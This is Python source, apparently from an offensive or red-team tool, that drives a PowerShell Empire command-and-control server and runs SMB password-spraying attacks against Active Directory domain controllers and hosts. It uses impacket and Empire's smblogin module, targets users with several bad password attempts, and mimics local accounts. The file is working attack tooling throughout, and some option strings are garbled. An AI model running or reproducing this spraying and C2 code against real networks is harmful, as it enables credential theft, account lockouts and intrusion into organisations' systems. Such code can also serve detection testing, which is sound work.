def execute_module_with_results(self,module_name, agent_name, module_options=None): #print ("Executing module " + module_name + " on " + agent_name) r = self.execute_module(module_name, agent_name, module_options) if r: #print ("Result: " + str(r['success'])) print_info("Msg: " + r['msg']) #print ("Msg: " + r['msg']) if r['success'] is not False: #print ("Waiting for results...") print_info("Waiting for results...") while True: for result in self.get_agent_results(agent_name)['results']: done = False if len(result) > 0: for entry in result['AgentResults']: if entry['taskID'] == r['taskID']: # Here we fix a bunch of stuff because Empire does not give standard output for all modules # This is for get_domain_sid because Empire doesn't have a "completed" string when its done if module_name == 'powershell/management/get_domain_sid': if 'S-1-5-21' in entry['results']: done = True # Empire returns "Job started: xxxxxx" as results but we need just the completed results if ' completed' in entry['results']: done = True if done == True: # if debug: print_debug('Result Buffer: {}'.format(entry), agent_name) return entry['results'] sleep(2)
def __init__(self,host,port,username,password): print_info("Connecting to Empire REST API Server on "+host+":"+str(port)+"....") self.host=host self.port=port self.base_url = 'https://'+host+':'+str(port) self.token= {'token': self.login(host,username,password)} if self.token['token'] is not None: print_status("Successfully connected to Empire server "+host) print_info("Starting Http Listener...") self.listener = self.get_listener() self.stager = self.generate_stager()
def impacket_spray_3(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True): ## Against several random hosts on the domain. Un authentication per host. if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...") else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimicking local accounts) ...") print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers = get_live_hosts(domain, computers, dc_ip) print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") if nusers > len(computers): users = users[:len(computers)] for idx, user in enumerate(users): smb_login(domain, user, spraypassword, computers[idx], sleep) if UseDomainAct else smb_login("", user, spraypassword, computers[idx], sleep)
def empire_spray_2(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassword, sleep, UseDomainAct=True, UseKerberos=True): ## Against one random host on the domain print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers = get_live_hosts(domain,computers,dc_ip) host = random.choice(computers) print_status("Randomly picked domain computer : " + host[0] + " - " + host[1]) computername = host[0] if UseKerberos else host[1] if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.") else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...") usernames = [] for user in users: usernames.append(user if UseDomainAct else generate_random_users(10)[0]) usernames = ",".join(usernames) if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") module_options = {'UserName': "******"" + usernames + "\"", 'ComputerName': computername, 'Password': spraypassword, 'Domain': domain, 'Sleep':str(sleep)} if UseDomainAct else {'UserName': "******"" + usernames + "\"", 'Domain':'', 'ComputerName': computername, 'Password': spraypassword,'Sleep':str(sleep)} results=empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options) print_status("Obtained results from the Powershell Empire agent") process_empire_results(results,host)
def impacket_spray_1(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True, ): ## Against the DC print_info("Querying for Domain Controllers...") dcs =get_dcs(duser, dpass, domain, dc_ip) dcs = get_live_hosts(domain,dcs,dc_ip) dc = random.choice(dcs) print_status("Randomly picked DC : "+dc[0]+" - "+dc[1]) if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login(domain, users, spraypassword, dc, sleep) else: users = generate_random_users(nusers) print_info("Using "+str(len(users))+" randomly generated usernames (mimic local account usage) ...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login("", users, spraypassword, dc, sleep)
def empire_spray_3(empiresession, agentid, duser, dpass, domain, dc_ip, nusers, spraypassowrd, sleep, UseDomainAct=True, UseKerberos=True): ## Against several random hosts on the domain. One authentication per host. if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") #users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray...") else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...") print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers=get_live_hosts(domain,computers,dc_ip) print_status("Using " + str(len(computers)) + " randomly picked domain computers for the spray...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each empire module execution...") if nusers > len(computers): users = users[:len(computers)] for idx, user in enumerate(users): duser = user if UseDomainAct else generate_random_users(1)[0] computername = computers[idx][0] if UseKerberos else computers[idx][1] module_options = {'UserName': duser, 'ComputerName': computername, 'Password': spraypassowrd, 'Domain': domain,'Sleep':'0'} if UseDomainAct else {'UserName': duser,'Domain':'', 'ComputerName': computername, 'Password': spraypassowrd,'Sleep':'0'} results = empiresession.execute_module_with_results("powershell/situational_awareness/network/smblogin", agentid, module_options) print_status("Obtained results from the Powershell Empire agent") process_empire_results(results,computers[idx]) # In thise scenario, adding the sleep here instead of Invoke-SMBLogin if sleep > 0 : time.sleep(sleep)
def impacket_spray_2(duser, dpass, domain, dc_ip, nusers, sleep, spraypassword, UseDomainAct=True): ## Against one random host on the domain print_info("Querying for domain computers that authenticated within the last day...") try: computers = random.sample(set(get_computers(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough computers, try a lower Nusers value") return print_status("Obtained " + str(len(computers)) + " computers.") print_info("Identifying live hosts ...") computers=get_live_hosts(domain,computers,dc_ip) host = random.choice(computers) print_status("Randomly picked domain computer : " + host[0] + " - " + host[1]) if UseDomainAct: print_info("Querying for domain users with badPwdCount>=3...") try: users = random.sample(set(get_users(duser, dpass, domain, dc_ip)), nusers) except: print_error("Did not find enough users, try a lower Nusers value") return print_status("Using " + str(len(users)) + " randomly picked domain users for the spray.") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login(domain, users, spraypassword, host, sleep) else: users = generate_random_users(nusers) print_info("Using " + str(len(users)) + " randomly generated usernames (mimic local account usage) ...") if sleep > 0: print_status("Sleeping " + str((sleep)) + " seconds between each authentication attempt...") smb_login("", users, spraypassword, host, sleep)